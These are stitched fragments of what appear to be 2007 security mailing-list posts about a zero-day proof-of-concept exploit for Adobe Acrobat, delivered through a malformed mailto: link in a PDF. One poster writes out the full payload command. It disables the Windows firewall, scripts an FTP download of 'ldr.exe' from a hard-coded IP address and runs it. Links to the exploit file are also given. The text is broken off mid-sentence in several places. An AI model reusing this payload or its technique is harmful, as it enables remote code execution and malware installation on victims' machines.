yes, it try to open:
mailt0:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"
PS. mailt0 == mailto
PPS. ***k
no, it's my PoC exploit and product of my researching based on public
information that pdp given in his blog
regards,
cyanid-E
2007/10/16, phioust <[EMAIL PROTECTED]>:
>
> is pdp architect releasing more 0day into the wild without his companies
> knowledge? I think this breaks the contract from a
...some additional information about 0day PDF exploit PoC:
Please download and open PDF PoC _locally_ in Adobe Acrobat (not in Adobe
Acrobat ActiveX control
because of some internal restrictions within Adobe ActiveX, it may be
bypassed via:
http://seclists.org/bugtraq/2007/Oct/0213.html but i didn
Zero day PDF exploit for Adobe Acrobat
Link to exploit:
Please download and open it locally in Adobe Acrobat (not in Adobe Acrobat
ActiveX control):
http://security.fedora-hosting.com/0day/pdf/pdf_poc.pdf
Description:
0-day proof of concept (PoC) exploit for Adobe Acrobat.
Software affecte